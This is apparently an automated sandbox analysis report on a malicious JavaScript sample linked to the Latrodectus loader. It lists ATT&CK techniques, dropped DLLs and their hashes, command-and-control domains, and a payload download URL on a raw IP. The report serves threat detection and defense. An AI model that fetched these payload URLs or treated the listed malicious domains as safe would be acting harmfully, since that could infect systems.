Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	1 DLL Side-Loading	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Windows Service	11 Access Token Manipulation	1 File Deletion	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Scheduled Task/Job	1 Windows Service	121 Masquerading	LSA Secrets	47 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	112 Process Injection	1 Valid Accounts	Cached Domain Credentials	471 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	12 Virtualization/Sandbox Evasion	DCSync	12 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Access Token Manipulation	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Rundll32	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	Embedded Payloads	Keylogging	21 System Network Configuration Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Document_a19_79b555791-28h97348k5477-3219g9.js	11%	ReversingLabs

Dropped Files

Source	Detection	Scanner
:wtfbbq (copy)	5%	ReversingLabs
C:\Users\user\AppData\Local\sharepoint\360total.dll	5%	ReversingLabs
C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll	5%	ReversingLabs
C:\Windows\Installer\MSI39EE.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3A4C.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3A7C.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3AAC.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3B6A.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
https://grizmotras.com/Qc-	0%	Avira URL Cloud	safe
http://crl3.digice7	0%	Avira URL Cloud	safe
http://45.95.11.217/ad.msiLin	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/onsG	0%	Avira URL Cloud	safe
ftp://ftp%2desktop.ini	0%	Avira URL Cloud	safe
http://45.95.11.217/ad.msi0	0%	Avira URL Cloud	safe
http://cacerts.dig	0%	Avira URL Cloud	safe
https://wrankaget.site/live/	0%	Avira URL Cloud	safe
https://grizmotras.com/	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/zedv5	0%	Avira URL Cloud	safe
https://grizmotras.com/live/ll	0%	Avira URL Cloud	safe
https://pewwhranet.com/live/	0%	Avira URL Cloud	safe
http://45.95.11.217/ad.msi-1780707424311028180	0%	Avira URL Cloud	safe
https://grizmotras.com/live/	0%	Avira URL Cloud	safe
https://grizmotras.com/live/)	0%	Avira URL Cloud	safe
http://45.95.11.217/ad.msi	0%	Avira URL Cloud	safe
http://45.95.11.217/ad.msi%	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/7aB	0%	Avira URL Cloud	safe
http://45.95.11.217/ad.msiV	0%	Avira URL Cloud	safe
https://jarinamaers.shop/	0%	Avira URL Cloud	safe
https://jarinamaers.shop/W	0%	Avira URL Cloud	safe
http://secure.globalsign	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/D	0%	Avira URL Cloud	safe
https://grizmotras.com//-cY	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/7	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/g5	0%	Avira URL Cloud	safe
https://grizmotras.com/Ep	0%	Avira URL Cloud	safe
https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
jarinamaers.shop	172.67.136.103	true	true	unknown
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
grizmotras.com	104.21.59.82	true	true	unknown
prod.globalsign.map.fastly.net	151.101.2.133	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wrankaget.site/live/	true	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/	true	Avira URL Cloud: safe	unknown
http://45.95.11.217/ad.msi	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://cacerts.dig	wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl3.digice7	wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://45.95.11.217/ad.msiLin	wscript.exe, 00000000.00000003.2156644454.00000207B4D0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pconf.f.360.cn/safe_update.php	rundll32.exe	false		high
ftp://ftp%2desktop.ini	rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	false	Avira URL Cloud: safe	low
https://grizmotras.com/	rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/Qc-	rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://45.95.11.217/ad.msi0	~DF3025BC11E5C97B03.TMP.2.dr, ~DFE66F7BB54D4BA8DC.TMP.2.dr, ~DFAB72B8B8E96537BE.TMP.2.dr, ~DF22CBD4461B033FB8.TMP.2.dr, ~DF0C3825C8A6AE7DC2.TMP.2.dr, inprogressinstallinfo.ipi.2.dr	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/zedv5	rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/onsG	rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/ll	rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://45.95.11.217/ad.msi-1780707424311028180	~DF428E4FF550ED71C3.TMP.2.dr	false	Avira URL Cloud: safe	unknown
https://pewwhranet.com/live/	rundll32.exe, 00000007.00000003.3308260791.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/)	rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/	rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://45.95.11.217/ad.msi%	wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pscan.f.360.cn/safe_update.php	rundll32.exe	false		high
http://dr.f.360.cn/scanlist	rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	false		high
https://www.thawte.com/cps0/	MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	false		high
http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie	rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	false		high
https://jarinamaers.shop/live/7aB	rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/repository0W	MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	false		high
http://45.95.11.217/ad.msiV	wscript.exe, 00000000.00000002.2158447349.00000207B5459000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/W	rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://sconf.f.360.cn/client_security_conf	rundll32.exe	false		high
http://dr.f.360.cn/scan	rundll32.exe	false		high
https://www.advancedinstaller.com	MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	false		high
https://jarinamaers.shop/live/D	rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://secure.globalsign	wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com//-cY	rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/g5	rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/7	rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/Ep	rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin	rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.59.82	grizmotras.com	United States	13335	CLOUDFLARENETUS	true
172.67.136.103	jarinamaers.shop	United States	13335	CLOUDFLARENETUS	true
45.95.11.217	unknown	Italy	13487	ULTRA-PACKETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431885
Start date and time:	2024-04-25 22:46:50 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Document_a19_79b555791-28h97348k5477-3219g9.js
Detection:	MAL
Classification:	mal100.spre.troj.evad.winJS@40/28@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 34 Number of non-executed functions: 335
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 151.101.2.133, 23.40.205.26, 23.40.205.9, 23.40.205.48, 23.40.205.49, 23.40.205.83, 23.40.205.34, 23.40.205.57, 23.40.205.81, 23.40.205.75, 23.40.205.56, 23.40.205.35, 23.40.205.66, 23.40.205.59, 23.40.205.43
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, secure.globalsign.com, fe3cr.delivery.mp.microsoft.com, global.prd.cdn.globalsign.com, download.windowsupdate.com.edgesuite.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Document_a19_79b555791-28h97348k5477-3219g9.js

Simulations

Behavior and APIs

Time	Type	Description
22:47:42	API Interceptor	2x Sleep call for process: wscript.exe modified
22:47:50	API Interceptor	1x Sleep call for process: msiexec.exe modified
22:48:27	API Interceptor	4947493x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.59.82	Util.dll	Get hash	malicious	Bazar Loader, Latrodectus	Browse
172.67.136.103	360total.dll.dll	Get hash	malicious	Latrodectus	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
jarinamaers.shop	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	172.67.136.103
jarinamaers.shop	ad.msi	Get hash	malicious	Latrodectus	Browse	104.21.46.75
prod.globalsign.map.fastly.net	https://d226ryxb715ss0.cloudfront.net/OPNC-v1.1.25.0.msi	Get hash	malicious	Unknown	Browse	151.101.2.133
	https://d226ryxb715ss0.cloudfront.net/OPNC-v1.1.25.0.msi	Get hash	malicious	Unknown	Browse	151.101.2.133
	f047010af12241b8c3a3f5dd4f8bed6257e7d71bd0e90811a7e3cde004e54fcf.zip	Get hash	malicious	Unknown	Browse	151.101.130.133
	fences-1.0.1.0.0-installer_t-TafY1.exe	Get hash	malicious	CobaltStrike	Browse	151.101.2.133
	MinerSearch_v1.4.5.1.exe	Get hash	malicious	Xmrig	Browse	151.101.2.133
	UKSJyZyeLX.exe	Get hash	malicious	Unknown	Browse	151.101.2.133
	vniSIKfm4h.dll	Get hash	malicious	Sodinokibi	Browse	151.101.2.133
	Vivaldi.3.5.2115.87.x64.exe	Get hash	malicious	Unknown	Browse	151.101.2.133
grizmotras.com	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	172.67.219.28
grizmotras.com	Util.dll	Get hash	malicious	Bazar Loader, Latrodectus	Browse	104.21.59.82
bg.microsoft.map.fastly.net	https://c-m-c-group.com/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	199.232.214.172
	https://microsoft-microsoft-microsoft-microsoft-microsoft.glowlaundry.com/?office=bWhhc2Vscm90aEBuZXhwb2ludC5jb20	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse	199.232.214.172
	https://lide.alosalca.fun/highbox#joeblow@xyz.com	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://neoparts.com.br./driz/oybe/am9sZW5lLmJ1cm5zQHNlY3VydXN0ZWNobm9sb2dpZXMuY29t$?utp=consumer&	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	http://free.filesearch.club/?q=grade+9+core+french+textbook	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://j4tpu.bpmsafelink.com/c/0aR4TTLkLUqplUI-2TrhdA	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	http://www.jdenviro.ca	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://r20.rs6.net/tn.jsp?f=001mdupJ4qBb-Nd2_ylzx8HBttlQ9opTAsCLDNaIzR_kjOMUNmpNcZJwTrf1-JKcQms1CJ9Uho976bwGC08_tX5C5noMjVDoDyLOXoK3aopxxStOM8t6wvTBKWgVo18etJYQ_eeHjJ4R2lwkep1pKOUg8VLdGfphtuo&c=&ch=/Er8BdK9PMSuOgr2lskWkeZAKVKx339#?ZnJhbmtfZHJhcGVyQGFvLnVzY291cnRzLmdvdg==	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	a.cmd	Get hash	malicious	Unknown	Browse	104.16.185.241
	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	172.67.219.28
	ad.msi	Get hash	malicious	Latrodectus	Browse	104.21.46.75
	https://fusiongsb.com/wofice/	Get hash	malicious	Unknown	Browse	104.21.20.41
	https://c-m-c-group.com/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://falic.co/office/office_cookies/main/	Get hash	malicious	Unknown	Browse	172.67.212.156
	https://autode.sk/4bb5BeV	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.27.92
	https://lide.alosalca.fun/highbox#joeblow@xyz.com	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://u18727881.ct.sendgrid.net/ls/click?upn=u001.C98xKppRPMcm9u3MCGfzKZoMS1OpBvTt67698T0dL36uvjeaIcwJCGWCF40JX0jTgfIq_7OnzmxzMpUZLpDhO-2FIQbFKADvzXAOcu2Z6qDokXjolLBB1Q9VRzsF9K8mIjVEFl-2BHay6WBbN5WlzpyVSr4HVkHTzvzCtmwku69-2FJZyLx3-2B4ShTXTnPqinKBtOGbSRbSYGRG3Lt22AUmt-2BZ99sH-2B6Jqf0nt-2BFsnaCp0VSm16eoPdzoH74Sn7jINM2DWCxglARpPWuPOE3iiXY03LGL6ko4g-3D-3D	Get hash	malicious	Unknown	Browse	1.1.1.1
ULTRA-PACKETUS	4Pl8B4ehEG.exe	Get hash	malicious	Glupteba, Mars Stealer, Stealc, Vidar	Browse	45.95.11.69
	file.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, Stealc, Vidar	Browse	45.95.11.69
	QN1omDissd.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, Stealc, Vidar	Browse	45.95.11.69
	AwV2hldmu0.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, Stealc, Vidar	Browse	45.95.11.69
	file.exe	Get hash	malicious	Amadey, Glupteba	Browse	45.95.11.69
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	45.95.11.69
	Doc_i93_65b929565-14q83944h2246-4336m9.js	Get hash	malicious	Unknown	Browse	45.95.11.134
	Doc_i93_65b929565-14q83944h2246-4336m9.js	Get hash	malicious	Unknown	Browse	45.95.11.134
	Rh7oVV7WuG.elf	Get hash	malicious	Mirai	Browse	2.59.251.226
	m5Egxr7B27.elf	Get hash	malicious	Mirai	Browse	2.59.251.238
CLOUDFLARENETUS	a.cmd	Get hash	malicious	Unknown	Browse	104.16.185.241
	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	172.67.219.28
	ad.msi	Get hash	malicious	Latrodectus	Browse	104.21.46.75
	https://fusiongsb.com/wofice/	Get hash	malicious	Unknown	Browse	104.21.20.41
	https://c-m-c-group.com/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://falic.co/office/office_cookies/main/	Get hash	malicious	Unknown	Browse	172.67.212.156
	https://autode.sk/4bb5BeV	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.27.92
	https://lide.alosalca.fun/highbox#joeblow@xyz.com	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://u18727881.ct.sendgrid.net/ls/click?upn=u001.C98xKppRPMcm9u3MCGfzKZoMS1OpBvTt67698T0dL36uvjeaIcwJCGWCF40JX0jTgfIq_7OnzmxzMpUZLpDhO-2FIQbFKADvzXAOcu2Z6qDokXjolLBB1Q9VRzsF9K8mIjVEFl-2BHay6WBbN5WlzpyVSr4HVkHTzvzCtmwku69-2FJZyLx3-2B4ShTXTnPqinKBtOGbSRbSYGRG3Lt22AUmt-2BZ99sH-2B6Jqf0nt-2BFsnaCp0VSm16eoPdzoH74Sn7jINM2DWCxglARpPWuPOE3iiXY03LGL6ko4g-3D-3D	Get hash	malicious	Unknown	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	172.67.136.103 104.21.59.82
	ad.msi	Get hash	malicious	Latrodectus	Browse	172.67.136.103 104.21.59.82
	SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsx	Get hash	malicious	Unknown	Browse	172.67.136.103 104.21.59.82
	SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.136.103 104.21.59.82
	ProconGO1121082800.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.136.103 104.21.59.82
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	172.67.136.103 104.21.59.82
	Version.125.7599.75.js	Get hash	malicious	SocGholish	Browse	172.67.136.103 104.21.59.82
	Database4.exe	Get hash	malicious	Unknown	Browse	172.67.136.103 104.21.59.82
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.136.103 104.21.59.82
	XV9q6mY4DI.exe	Get hash	malicious	Babuk, Djvu	Browse	172.67.136.103 104.21.59.82

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\sharepoint\360total.dll	360total.dll.dll	Get hash	malicious	Latrodectus	Browse
C:\Users\user\AppData\Local\sharepoint\360total.dll	ad.msi	Get hash	malicious	Latrodectus	Browse
C:\Windows\Installer\MSI39EE.tmp	ad.msi	Get hash	malicious	Latrodectus	Browse
	avp.msi	Get hash	malicious	Unknown	Browse
	Cheater Pro 1.6.0.msi	Get hash	malicious	Unknown	Browse
	Cheat Lab 2.7.2.msi	Get hash	malicious	Unknown	Browse
	payload.js	Get hash	malicious	Unknown	Browse
	payload.js	Get hash	malicious	Unknown	Browse
	Doc_m42_81h118103-88o62135w8623-1999q9.js	Get hash	malicious	Unknown	Browse
	avp.msi	Get hash	malicious	Unknown	Browse
	sharepoint.msi	Get hash	malicious	Unknown	Browse
	slack.msi	Get hash	malicious	Bazar Loader	Browse
:wtfbbq (copy)	360total.dll.dll	Get hash	malicious	Latrodectus	Browse
:wtfbbq (copy)	ad.msi	Get hash	malicious	Latrodectus	Browse
C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll	360total.dll.dll	Get hash	malicious	Latrodectus	Browse
	ad.msi	Get hash	malicious	Latrodectus	Browse

Created / dropped Files

:wtfbbq (copy)

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	906752
Entropy (8bit):	6.2833336520446625
Encrypted:	false
SSDEEP:	12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
MD5:	74143402C40AC2E61E9F040A2D7E2D00
SHA1:	4053DC85BB86C47C63F96681D6A62C21CD6342A3
SHA-256:	1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
SHA-512:	4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: 360total.dll.dll, Detection: malicious, Browse Filename: ad.msi, Detection: malicious, Browse
